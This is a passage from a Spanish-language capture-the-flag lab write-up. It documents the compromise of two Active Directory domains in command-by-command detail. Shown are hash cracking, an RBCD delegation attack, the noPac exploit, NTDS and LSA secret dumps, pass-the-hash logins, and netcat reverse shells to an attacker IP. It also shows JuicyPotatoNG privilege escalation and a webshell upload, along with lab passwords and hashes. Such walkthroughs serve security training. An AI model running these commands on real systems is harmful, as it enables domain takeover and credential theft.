Loaded 3 password hashes with 3 different salts (mscash2, MS Cache Hash 2 (DCC2) [PBKDF2-SHA1 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 1 candidate left, minimum 16 needed for performance.
FWErfsgt4ghd7f6dwx (MEGAAIRLINE.LOCAL/anna)
Use the "--show --format=mscash2" options to display all of the cracked passwords reliably
Session completed.

Comprobamos las credenciales con crackmapexec y son validas a nivel de dominio

❯ crackmapexec smb dc2.megaairline.local -u anna -p FWErfsgt4ghd7f6dwx
SMB         megaairline.local 445    DC2              [*] Windows 10.0 Build 17763 x64 (name:DC2) (domain:megaairline.local) (signing:True) (SMBv1:False)  
SMB         megaairline.local 445    DC2              [+] megaairline.local\anna:FWErfsgt4ghd7f6dwx

Para enumerar el dominio igual que antes usaremos bloodhound, nos autenticaremos con las credenciales de anna y toda la informacion la guardamos en un zip

❯ bloodhound-python -u anna -p FWErfsgt4ghd7f6dwx -ns 192.168.11.201 -d megaairline.local -c All --zip  
INFO: Found AD domain: megaairline.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc2.megaairline.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 4 computers
INFO: Connecting to LDAP server: dc2.megaairline.local
INFO: Found 12 users
INFO: Connecting to GC LDAP server: dc2.megaairline.local
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: 
INFO: Querying computer: 
INFO: Querying computer: MS01.megaairline.local
INFO: Querying computer: DC2.megaairline.local
INFO: Done in 00M 33S
INFO: Compressing output into 20230901014306_bloodhound.zip

Despues de subir el zip a bloodhound, enumeramos partiendo del usuario anna y nos encontramos con que tiene privilegios GenericAll sobre el equipo DC2 por lo que podriamos explotarlo facilmente mediante un ataque RBCD hacia el DC2

Este tipo de ataque RBCD se puede hacer facilmente con las herramientas impacket, creando la cuenta de equipo con addcomputer y hacer la delegacion con rbcd

❯ impacket-addcomputer -computer-name attackersystem$ -computer-pass 123456 megaairline.local/anna:FWErfsgt4ghd7f6dwx
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Successfully added machine account attackersystem$ with password 123456.

❯ impacket-rbcd -delegate-from attackersystem$ -delegate-to DC2$ -action write megaairline.local/anna:FWErfsgt4ghd7f6dwx  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] attackersystem$ can now impersonate users on DC2$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     attackersystem$   (S-1-5-21-775547830-308377188-957446042-9104)

Despues de hacer la delegacion solo nos queda solicitar un ticket autenticandonos como el equipo creado attackersystem suplantando al usuario Administrator

❯ impacket-getST -spn cifs/dc2.megaairline.local megaairline.local/'attackersystem$':123456 -impersonate Administrator  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Getting TGT for user
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

Ya con este ticket podriamos autenticarnos con el y conectarnos al DC con wmiexec

❯ impacket-wmiexec dc2.megaairline.local -k -no-pass -shell-type powershell  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> whoami
megaairline\administrator

PS C:\>

O para mas comodidad con crackmapexec dumpear el ntds y asi poder ver los hashes en formato NT de todos los usuarios y equipos asociados a este dominio

❯ crackmapexec smb dc2.megaairline.local -k --use-kcache --ntds drsuapi
SMB         dc2.megaairline.local 445    DC2              [*] Windows 10.0 Build 17763 x64 (name:DC2) (domain:megaairline.local) (signing:True) (SMBv1:False)  
SMB         dc2.megaairline.local 445    DC2              [+] megaairline.local\Administrator from ccache (Pwn3d!)
SMB         dc2.megaairline.local 445    DC2              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc2.megaairline.local 445    DC2              Administrator:500:aad3b435b51404eeaad3b435b51404ee:674f1a5c73f4faad8ddbf7f3bf86db60:::
SMB         dc2.megaairline.local 445    DC2              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc2.megaairline.local 445    DC2              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a3a4a21b530fcfafb9e4ae8a97d001d:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\elliot:1108:aad3b435b51404eeaad3b435b51404ee:74fdf381a94e1e446aaedf1757419dcd:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\anna:2101:aad3b435b51404eeaad3b435b51404ee:78350c7b3c5fe865d954d5b47013e21f:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\thomas:2601:aad3b435b51404eeaad3b435b51404ee:f639889cc1edee80e4469d0cb118be53:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\pippa:2602:aad3b435b51404eeaad3b435b51404ee:f5b43ca4ad68bce5349f7cb4b3168e4e:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\angela:2603:aad3b435b51404eeaad3b435b51404ee:df36ca14e6d8a3d06b2c895895dbf48a:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\nigel:2604:aad3b435b51404eeaad3b435b51404ee:923ef4c82666a2116ac5deda0a6b2e52:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\kate:2605:aad3b435b51404eeaad3b435b51404ee:805caf15ba4486fa23aeb1752503add2:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\emily:2606:aad3b435b51404eeaad3b435b51404ee:24bfa93d0525c9f374467224de523a6f:::
SMB         dc2.megaairline.local 445    DC2              DC2$:1000:aad3b435b51404eeaad3b435b51404ee:cdfd67901176f6168d325d9ee3919e82:::
SMB         dc2.megaairline.local 445    DC2              MS01$:1106:aad3b435b51404eeaad3b435b51404ee:1a60da9a2479af44780749249ed6248f:::
SMB         dc2.megaairline.local 445    DC2              attackersystem$:9104:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SMB         dc2.megaairline.local 445    DC2              DAEDALUS$:1107:aad3b435b51404eeaad3b435b51404ee:680a37bc4b11bc76657bc23341beffd6:::

Ya con el hash NT de Administrator simplemente podriamos conectarnos al DC2 usando evil-winrm y obtener una powershell donde podemos leer la flag

❯ evil-winrm -i dc2.megaairline.local -u Administrator -H 674f1a5c73f4faad8ddbf7f3bf86db60  
PS C:\Users\Administrator\Documents> whoami
megaairline\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ASCENSION{g0t_a1L_7h3_ac3s}
PS C:\Users\Administrator\Documents>


Extra 1

CredEnum - Administrator WEB01


Volviendo a la primera shell que teniamos si con Seatbelt enumeramos credenciales encontramos la contraseña de sa probablemente para conectarse a mssql

PS C:\ProgramData> .\Seatbelt.exe credenum


                        %&&@@@&&                                                                                  
                        &&&&&&&%%%,                       #&&@@@@@@%%%%%%###############%                         
                        &%&   %&%%                        &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%%  
%%%%%%%%%%%######%%%#%%####%  &%%**#                      @////(((&%%%%%%######################(((((((((((((((((((  
#%#%%%%%%%#######%#%%#######  %&%,,,,,,,,,,,,,,,,         @////(((&%%%%%#%#####################(((((((((((((((((((  
#%#%%%%%%#####%%#%#%%#######  %%%,,,,,,  ,,.   ,,         @////(((&%%%%%%%######################(#(((#(#((((((((((  
#####%%%####################  &%%......  ...   ..         @////(((&%%%%%%%###############%######((#(#(####((((((((  
#######%##########%#########  %%%......  ...   ..         @////(((&%%%%%#########################(#(#######((#####  
###%##%%####################  &%%...............          @////(((&%%%%%%%%##############%#######(#########((#####  
#####%######################  %%%..                       @////(((&%%%%%%%################                        
                        &%&   %%%%%      Seatbelt         %////(((&%%%%%%%%#############*                         
                        &%%&&&%%%%%        v1.2.1         ,(((&%%%%%%%%%%%%%%%%%,                                 
                         #%%%%##,                                                                                 

====== CredEnum ======

  Target              : Microsoft:SSMS:18:WEB01:sa:8c91a03d-f9b4-46c0-a305-b5dcc79ff907:1
  UserName            : sa
  Password            : MySAisL33TM4n
  CredentialType      : Generic
  PersistenceType     : LocalComputer
  LastWriteTime       : 4/2/2021 7:11:52 AM

  Target              : Microsoft:SSMS:18:::00000000-0000-0000-0000-000000000000:0
  UserName            : 
  Password            : 
  CredentialType      : Generic
  PersistenceType     : LocalComputer
  LastWriteTime       : 4/2/2021 7:08:44 AM

[*] Completed collection in 0.02 seconds

PS C:\ProgramData>

Las credenciales son validas y podemos conectarnos con mssqlclient a WEB01

❯ impacket-mssqlclient sa:MySAisL33TM4n@web01.daedalus.local
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WEB01): Line 1: Changed database context to 'master'.
[*] INFO(WEB01): Line 1: Changed language setting to us_english.  
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL>

Ya dentro de mssql podemos ejecutar comandos haciendo uso de xp_cmdshell

SQL> xp_cmdshell whoami  

output
----------------------
nt service\mssqlserver

SQL>

Para obtener una revshell usaremos netcat.exe que habiamos subido de antes para enviarnos una powershell, que recibimos como la cuenta de servicio de mssql

SQL> xp_cmdshell cmd /c C:\ProgramData\netcat.exe -e powershell 10.10.14.10 443  


❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.20
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\System32> whoami
nt service\mssqlserver
PS C:\Windows\System32> hostname
WEB01
PS C:\Windows\System32>

Al ser una cuenta de servicio este usuario tiene el SeImpersonatePrivilege habilitado que nos permite suplantar a otros usuarios, incluso nt authority\system

PS C:\Windows\System32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========  
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\Windows\System32>

Descargamos JuicyPotatoNG y ejecutamos nuevamente netcat para enviar una shell

PS C:\ProgramData> curl 10.10.14.10/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\ProgramData> .\JuicyPotatoNG.exe -t * -p C:\ProgramData\netcat.exe -a '-e powershell 10.10.14.10 443'  

	 JuicyPotatoNG
	 by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247 
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful! 

PS C:\ProgramData>

La shell que recibimos esta vez es como el usuario nt authority\system el cual tiene maximos privilegios sobre el equipo donde nos encontramos que es WEB01

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.20
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\> whoami
nt authority\system
PS C:\> hostname
WEB01
PS C:\>


Extra 2

Machine Credentials - Administrator DC1


Antes en WEB01 usabamos SharpDPAPI para buscar credenciales pero si buscamos credenciales de maquinas, encontramos las de Administrator a nivel de dominio

PS C:\Users\Administrator\Documents> .\SharpDPAPI.exe machinecredentials

  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.11.3


[*] Action: Machine DPAPI Credential Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: E7BC9098EA7313E0B042679565EDF75CAD219106D3FE11B0F39C1F1E4EAEA01DC393F563C6190EC7
[*]    m/u : E7BC9098EA7313E0B042679565EDF75CAD219106 / D3FE11B0F39C1F1E4EAEA01DC393F563C6190EC7  

[*] Triaging System Credentials

Folder       : C:\WINDOWS\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : ADBAA7254AF7B3AC4CBF7B8CE9BD6911

    guidMasterKey    : {e892348e-5a34-4a9a-bd46-2f5f3186318b}
    size             : 560
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 10/13/2020 10:49:57 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{27B6CB8A-0163-46AB-A0C7-387E45A70048}
    TargetAlias      :
    Comment          :
    UserName         : WEB01\svc_dev
    Credential       : a2W@rWAHzG+zQrB4

  CredFile           : AF61A1B16221450058FB4D69F7B3FE73

    guidMasterKey    : {e892348e-5a34-4a9a-bd46-2f5f3186318b}
    size             : 560
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 10/14/2020 10:15:19 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{64EDB31F-E848-4632-8F9F-377559BFA088}
    TargetAlias      :
    Comment          :
    UserName         : WEB01\Administrator
    Credential       : EXuLyX_WtHxx9pS9

  CredFile           : CEED724993CAA9310FC2FE2F72ECE137

    guidMasterKey    : {e892348e-5a34-4a9a-bd46-2f5f3186318b}
    size             : 592
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 10/13/2020 2:56:34 AM
    TargetName       : Domain:batch=TaskScheduler:Task:{D3000B16-D5D6-4FF3-9038-F368155DBB77}
    TargetAlias      :
    Comment          :
    UserName         : DAEDALUS\Administrator
    Credential       : pleasefastenyourseatbelts01!

PS C:\Users\Administrator\Documents>

Comprobamos la contraseña con crackmapexec hacia el DC1 y devuelve un Pwn3d!

❯ crackmapexec smb dc1.daedalus.local -u Administrator -p pleasefastenyourseatbelts01!
SMB         daedalus.local  445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)  
SMB         daedalus.local  445    DC1              [+] daedalus.local\Administrator:pleasefastenyourseatbelts01! (Pwn3d!)

Solo nos resta conectarnos con evil-winrm usando la contraseña de Administrator hacia el DC1 y obtener una powershell comprometiendo todo el primer dominio

❯ evil-winrm -i dc1.daedalus.local -u Administrator -p pleasefastenyourseatbelts01!  
PS C:\Users\Administrator\Documents> whoami
daedalus\administrator
PS C:\Users\Administrator\Documents> type ..\Desktop\flag.txt
ASCENSION{0G_adm1ni5tR@tor}
PS C:\Users\Administrator\Documents>


Extra 3

IIS Account Service - Administrator MS01


Volviendo a la revshell como elliot en MS01, sabemos que la web es un IIS por lo que deberia correr aspx, podemos subir una webshell al directorio principal

PS C:\inetpub\wwwroot> whoami
megaairline\elliot
PS C:\inetpub\wwwroot> curl 192.168.11.6/cmd.aspx -o cmd.aspx  
PS C:\inetpub\wwwroot>

Cargamos el cmd.aspx en la web y nos lo interpreta, al ejecutar el comando whoami logramos ejecutar comandos como una cuenta de servicio en el equipo MS01

Para obtener una powershell aprovecharemos lo que teniamos con netsh para asi enviarnos una powershell al DC1 que lo redirigira a nuestro equipo por el 4444

En nuestro listener de netcat obtenemos una shell como una cuenta de servicio

❯ netcat -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.13.38.20
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> hostname
MS01
PS C:\windows\system32\inetsrv>

Al ser una cuenta de servicio este usuario tiene el SeImpersonatePrivilege habilitado que nos permite suplantar a otros usuarios, incluso nt authority\system

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========  
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\windows\system32\inetsrv>

Descargamos JuicyPotatoNG y ejecutamos nuevamente netcat para enviar una shell

PS C:\ProgramData> curl 192.168.11.6/JuicyPotatoNG.exe -o JuicyPotatoNG.exe
PS C:\ProgramData> .\JuicyPotatoNG.exe -t * -p netcat.exe -a '-e powershell 192.168.11.6 4444'

         JuicyPotatoNG
         by decoder_it & splinter_code

[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation  
[+] CreateProcessAsUser OK
[+] Exploit successful!

PS C:\ProgramData>

La shell que recibimos esta vez es como el usuario nt authority\system el cual tiene maximos privilegios sobre el equipo donde nos encontramos que es MS01

❯ netcat -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.13.38.20
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\> whoami
nt authority\system
PS C:\> hostname
MS01
PS C:\>


Extra 4

CVE-2021-42278 / CVE-2021-42287 - Administrator (DC1 / DC2)


Como alternativa podemos usar noPac donde aunque el parametro -shell no funcionará directamente si que nos creara un ticket como Administrator

❯ python3 noPac.py daedalus.local/billing_user:D43d4lusB1ll1ngB055 -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[-] Resolved Failed: None of DNS query names exist: DC1.daedalus.local., DC1.daedalus.local.localdomain.  
[*] Selected Target dc1.daedalus.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-KQZHNAXLNYM$"
[*] MachineAccount "WIN-KQZHNAXLNYM$" password = ^FLg%fP6!Q)#
[*] Successfully added machine account WIN-KQZHNAXLNYM$ with password ^FLg%fP6!Q)#.
[*] WIN-KQZHNAXLNYM$ object = CN=WIN-KQZHNAXLNYM,CN=Computers,DC=daedalus,DC=local
[*] WIN-KQZHNAXLNYM$ sAMAccountName == dc1
[*] Saving a DC's ticket in dc1.ccache
[*] Reseting the machine account to WIN-KQZHNAXLNYM$
[*] Restored WIN-KQZHNAXLNYM$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc1.daedalus.local.ccache
[*] Attempting to del a computer with the name: WIN-KQZHNAXLNYM$
[-] Delete computer WIN-KQZHNAXLNYM$ Failed! Maybe the current user does not have permission.

❯ export KRB5CCNAME=Administrator_dc1.daedalus.local.ccache

En este punto podemos usar el ticket para autenticarnos contra la maquina y obtener una shell en el DC1 por lo que nos saltamos el resto de explotaciones

❯ impacket-wmiexec dc1.daedalus.local -k -no-pass -shell-type powershell  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> whoami
daedalus\administrator

PS C:\>

Como nos autenticamos como Administrator podemos dumpear el ntds para ver todos los hashes NT del dominio con los que podemos hacer un passthehash

❯ crackmapexec smb dc1.daedalus.local -k --use-kcache --ntds drsuapi
SMB         dc1.daedalus.local 445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)
SMB         dc1.daedalus.local 445    DC1              [+] daedalus.local\Administrator from ccache (Pwn3d!)
SMB         dc1.daedalus.local 445    DC1              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc1.daedalus.local 445    DC1              Administrator:500:aad3b435b51404eeaad3b435b51404ee:a3ff633d308be8e06dbb4e2e88783533:::
SMB         dc1.daedalus.local 445    DC1              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc1.daedalus.local 445    DC1              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3e1e73de1f69e094386b8496fdbdaa90:::
SMB         dc1.daedalus.local 445    DC1              daedalus.local\elliot:1112:aad3b435b51404eeaad3b435b51404ee:74fdf381a94e1e446aaedf1757419dcd:::
SMB         dc1.daedalus.local 445    DC1              daedalus.local\svc_backup:1602:aad3b435b51404eeaad3b435b51404ee:f913cd9d773be0d48389d45a20b6364a:::
SMB         dc1.daedalus.local 445    DC1              daedalus.local\billing_user:1603:aad3b435b51404eeaad3b435b51404ee:65043c86ce4386582442450feed8ce53:::  
SMB         dc1.daedalus.local 445    DC1              DC1$:1000:aad3b435b51404eeaad3b435b51404ee:c5a43d3b4bb5b1e5aa0c0fd1fc33a8fb:::
SMB         dc1.daedalus.local 445    DC1              WEB01$:1109:aad3b435b51404eeaad3b435b51404ee:cea841ef31ca13817f6d6c73b3c26b1a:::
SMB         dc1.daedalus.local 445    DC1              WIN-KQZHNAXLNYM$:9103:aad3b435b51404eeaad3b435b51404ee:fa643e23dd63ddd0af802b010b43fc26:::
SMB         dc1.daedalus.local 445    DC1              MEGAAIRLINE$:1108:aad3b435b51404eeaad3b435b51404ee:f68f00c91f2b98c63593309aa61ae76d:::

Podemos simplemente conectarmos como Administrator a DC1 y obtener una shell

❯ evil-winrm -i dc1.daedalus.local -u Administrator -H a3ff633d308be8e06dbb4e2e88783533  
PS C:\Users\Administrator\Documents> whoami
daedalus\administrator
PS C:\Users\Administrator\Documents> hostname
DC1
PS C:\Users\Administrator\Documents>

Aunque si dumpeamos los secretos lsa encontramos una contraseña en texto plano para Administrator, tambien es valida pero en este caso a nivel de dominio

❯ crackmapexec smb dc1.daedalus.local -k --use-kcache --lsa         
SMB         dc1.daedalus.local 445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:daedalus.local) (signing:True) (SMBv1:False)
SMB         dc1.daedalus.local 445    DC1              [+] daedalus.local\Administrator from ccache (Pwn3d!)
SMB         dc1.daedalus.local 445    DC1              [+] Dumping LSA secrets
SMB         dc1.daedalus.local 445    DC1              MEGAAIRLINE.LOCAL/Administrator:$DCC2$10240#Administrator#3ea6e70c7142de7e521195f33086a2bf: (2020-10-13 12:53:58)
SMB         dc1.daedalus.local 445    DC1              DAEDALUS\DC1$:plain_password_hex:80ee1497c9f6cc7d6116bdd95938572bbab0d4bdf022ba201d1e4dbab1d7ead524c8eff4bc4a864c7569f6dff30c89914d9f83e47840a8e7705bb9c2dc0b8be208e88e5a846e94f70310c249bac1cef10803a83bd9bab790a6d02146918775ff6bff9d8c082378c0f783d4a9a29fb3eb81775f8eac2e0f62075503f39209ea18634b7a58e180e43cfe49cbc46801ed9a3a57a9033940a8867be1febd9dc9340abcab572f3999a0f279538b964ed3e16aa32e2d5567089a6835be29297f44171204163280c96755b5889278b2bd21a7da8c289462368bb1357d2f9ef0d64a16d23c5307464ba912c36be823632adb11e4  
SMB         dc1.daedalus.local 445    DC1              DAEDALUS\DC1$:aad3b435b51404eeaad3b435b51404ee:c5a43d3b4bb5b1e5aa0c0fd1fc33a8fb:::
SMB         dc1.daedalus.local 445    DC1              DAEDALUS\administrator:pleasefastenyourseatbelts01!
SMB         dc1.daedalus.local 445    DC1              dpapi_machinekey:0xee3ee8172d485d91d928e75a6199a2d9d1552d2a
dpapi_userkey:0x872350e7691cd1f10c04962e21f42f7921a64796
SMB         dc1.daedalus.local 445    DC1              NL$KM:4d9aaba35a7a2f5025fc831a10fe1ea5d3b99da8b54eeb602bd678537b732ae044a8770c4836372680d02c90d416aae566534b7fa92d50998a260a20400d9be1

Con esta contraseña tambien podriamos conectarnos al DC1 usando evil-winrm

❯ evil-winrm -i dc1.daedalus.local -u Administrator -p pleasefastenyourseatbelts01!  
PS C:\Users\Administrator\Documents> whoami
daedalus\administrator
PS C:\Users\Administrator\Documents> hostname
DC1
PS C:\Users\Administrator\Documents>

Pasa exactamente lo mismo con el segundo dominio, al ejecutar noPac obtenemos un ticket como el usuario Administrator con el que podemos autenticarnos

❯ python3 noPac.py megaairline.local/elliot:'84@m!n@9' -use-ldap

███    ██  ██████  ██████   █████   ██████ 
████   ██ ██    ██ ██   ██ ██   ██ ██      
██ ██  ██ ██    ██ ██████  ███████ ██      
██  ██ ██ ██    ██ ██      ██   ██ ██      
██   ████  ██████  ██      ██   ██  ██████ 
    
[*] Current ms-DS-MachineAccountQuota = 10
[-] Resolved Failed: None of DNS query names exist: DC2.megaairline.local., DC2.megaairline.local.localdomain.  
[*] Selected Target dc2.megaairline.local
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Adding Computer Account "WIN-DWYFTZ3RGAP$"
[*] MachineAccount "WIN-DWYFTZ3RGAP$" password = BjrmCo7b)vx5
[*] Successfully added machine account WIN-DWYFTZ3RGAP$ with password BjrmCo7b)vx5.
[*] WIN-DWYFTZ3RGAP$ object = CN=WIN-DWYFTZ3RGAP,CN=Computers,DC=megaairline,DC=local
[*] WIN-DWYFTZ3RGAP$ sAMAccountName == dc2
[*] Saving a DC's ticket in dc2.ccache
[*] Reseting the machine account to WIN-DWYFTZ3RGAP$
[*] Restored WIN-DWYFTZ3RGAP$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] 	Requesting S4U2self
[*] Saving a user's ticket in Administrator.ccache
[*] Rename ccache to Administrator_dc2.megaairline.local.ccache
[*] Attempting to del a computer with the name: WIN-DWYFTZ3RGAP$
[-] Delete computer WIN-DWYFTZ3RGAP$ Failed! Maybe the current user does not have permission.

❯ export KRB5CCNAME=Administrator_dc2.megaairline.local.ccache

En este punto podemos usar el ticket para autenticarnos contra la maquina y obtener una shell en el DC2 por lo que nos saltamos el resto de explotaciones

❯ impacket-wmiexec dc2.megaairline.local -k -no-pass -shell-type powershell  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> whoami
megaairline\administrator

PS C:\>

Como nos autenticamos como Administrator podemos dumpear el ntds para ver todos los hashes NT del dominio con los que podemos hacer un passthehash

❯ crackmapexec smb dc2.megaairline.local -k --use-kcache --ntds drsuapi
SMB         dc2.megaairline.local 445    DC2              [*] Windows 10.0 Build 17763 x64 (name:DC2) (domain:megaairline.local) (signing:True) (SMBv1:False)  
SMB         dc2.megaairline.local 445    DC2              [+] megaairline.local\Administrator from ccache (Pwn3d!)
SMB         dc2.megaairline.local 445    DC2              [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         dc2.megaairline.local 445    DC2              Administrator:500:aad3b435b51404eeaad3b435b51404ee:674f1a5c73f4faad8ddbf7f3bf86db60:::
SMB         dc2.megaairline.local 445    DC2              Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         dc2.megaairline.local 445    DC2              krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a3a4a21b530fcfafb9e4ae8a97d001d:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\elliot:1108:aad3b435b51404eeaad3b435b51404ee:74fdf381a94e1e446aaedf1757419dcd:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\anna:2101:aad3b435b51404eeaad3b435b51404ee:78350c7b3c5fe865d954d5b47013e21f:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\thomas:2601:aad3b435b51404eeaad3b435b51404ee:f639889cc1edee80e4469d0cb118be53:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\pippa:2602:aad3b435b51404eeaad3b435b51404ee:f5b43ca4ad68bce5349f7cb4b3168e4e:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\angela:2603:aad3b435b51404eeaad3b435b51404ee:df36ca14e6d8a3d06b2c895895dbf48a:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\nigel:2604:aad3b435b51404eeaad3b435b51404ee:923ef4c82666a2116ac5deda0a6b2e52:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\kate:2605:aad3b435b51404eeaad3b435b51404ee:805caf15ba4486fa23aeb1752503add2:::
SMB         dc2.megaairline.local 445    DC2              megaairline.local\emily:2606:aad3b435b51404eeaad3b435b51404ee:24bfa93d0525c9f374467224de523a6f:::
SMB         dc2.megaairline.local 445    DC2              DC2$:1000:aad3b435b51404eeaad3b435b51404ee:cdfd67901176f6168d325d9ee3919e82:::
SMB         dc2.megaairline.local 445    DC2              MS01$:1106:aad3b435b51404eeaad3b435b51404ee:1a60da9a2479af44780749249ed6248f:::
SMB         dc2.megaairline.local 445    DC2              attackersystem$:9104:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
